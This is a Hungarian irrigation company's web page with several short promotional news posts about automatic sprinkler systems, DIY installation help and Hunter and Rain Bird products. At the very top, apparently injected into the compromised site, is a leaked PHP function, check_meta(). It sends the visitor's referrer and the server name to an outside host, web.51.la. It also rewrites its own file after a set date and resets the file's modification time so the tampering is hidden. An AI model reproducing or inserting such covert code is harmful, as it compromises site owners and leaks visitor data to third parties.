check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hírek

Kedves látogató!

Sok szeretettel üdvözlünk, az Öntözz okosan! oldalon. Látogatóink kérésére, oldalunkat folyamatosan töltjük fel adatokkal, hasznos tanácsokkal, inspirációs képekkel. Szívesen fogadunk bármilyen javaslatot, vagy esetleges hibákkal kapcsolatos észrevételeket. Fontos számunkra, hogy mindenki megtalálja a számára fontos információkat, útmutatásokat.  Kérlek, nézz vissza később is, ha esetleg nem találtad meg amit kerestél.

Kellemes böngészést kívánunk!  Öntözz okosan! csapata

 

 

Neked kötelesség vagy inkább szórakozás a kerti locsolás?

Amennyiben kötelességnek érzed, akkor jó helyen jársz. Hívj minket bizalommal és mi segítünk, hogy a kerti locsolás helyett a szórakozásnak hódolhass, miközben egy automata öntözőrendszer dolgozik helyetted, elvégezve a fáradságos munkát, hogy Te kikapcsolhass, pihenhess. Keress meg minket elérhetőségeinken, ha kíváncsi vagy a részletekre!

 

Kellemes böngészést kívánunk!  Öntözz okosan! csapata

 

 

Meg szeretnéd építeni saját öntözőrendszered?

 

Akkor hozd be hozzánk a kerted méretarányos rajzát, amin jelöld az öntözendő területeket, növényeket és az északi irányt. Mi kiszámoljuk, összeállítjuk a szükséges anyagokat és adunk egy szerelési útmutatást a kiépítéshez. Ha a kiépítéshez szükséges anyagokat nálunk vásárolod meg, akkor mi odaadjuk az elkészült tervet az öntözőrendszeredről, ami alapján már csak a kézügyességed kell használnod. Jelen ajánlatunk összevonható az aktuális akcióinkkal! Építsd meg magad öntöződ és mi segítünk, ha elakadnál valamiben az építés folyamán. Keress minket az elérhetőségeinken.

 

Kellemes böngészést kívánunk!  Öntözz okosan! csapata

 

 

Kedves látogató!

 

Sokan mondtátok, hogy szívesen öntöznétek a vezető öntözéstechnikát gyártó cégek termékeivel, de anyagi lehetőségeitek nem teszi lehetővé, hogy kiépítsetek egy automata öntözőrendszert. Sokat gondolkodtam és megtaláltam a kérésetekre a választ. Örömmel tudom mondani, hogy ha a Hunter, vagy a Rain Bird kiváló öntözőfejeivel akarjátok megoldani az egyenletes vízkijuttatást az öntözéshez, akkor az üzletben megvásárolhatjátok hozzá a megfelelő kellékeket. Egyszerűbb nem is lehetne! Megvásárolod az általad kiválasztott öntözőfejet, mi javaslunk hozzá a lehelyezéshez szükséges alkatrészeket, és ha kéred össze is szereljük neked. Ha tetszik, hazaviszed, leszúrod, oda ahol öntözni akarsz, hozzá kapcsolod a locsolótömlőt, beállítod a szektort és kényelmesen hátradőlsz, akár egy sörrel a kezedben a teraszon és gyönyörködsz az egyenletes vízfüggönyben és élvezed a szabadidőt, amit a locsolás helyett bármire fordíthatsz. Mikor úgy gondolod, hogy kész az öntözés akkor összeszeded és viszed a másik területre. Ha felkeltettem az érdeklődésed, akkor gyere el hozzánk az üzletbe és győződj meg róla a saját szemeddel. Hamarosan öntözőfej bemutatót tartunk, hogy megkönnyítsük a választást.

Az öntözés legyen egyenletes, olcsó, praktikus és fáradságmentes! 

Kellemes böngészést kívánunk!  Öntözz okosan! csapata

  

 

Csinálj magadnak öntözőrendszert!

 

Elérhetőek a HUNTER, Rain Bird, Irritrol, Irritec öntözéstechnikai termékek 2014-es árlistái. A letölthető dokumentumok között megtalálod a tervezéshez, kiépítéshez szükséges dokumentumokat. Kérlek, nézz vissza később, ha nem találtad meg  most amit kerestél. Az oldal folyamatos frissítés alatt van.

Kellemes böngészést kívánunk!  Öntözz okosan! csapata

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú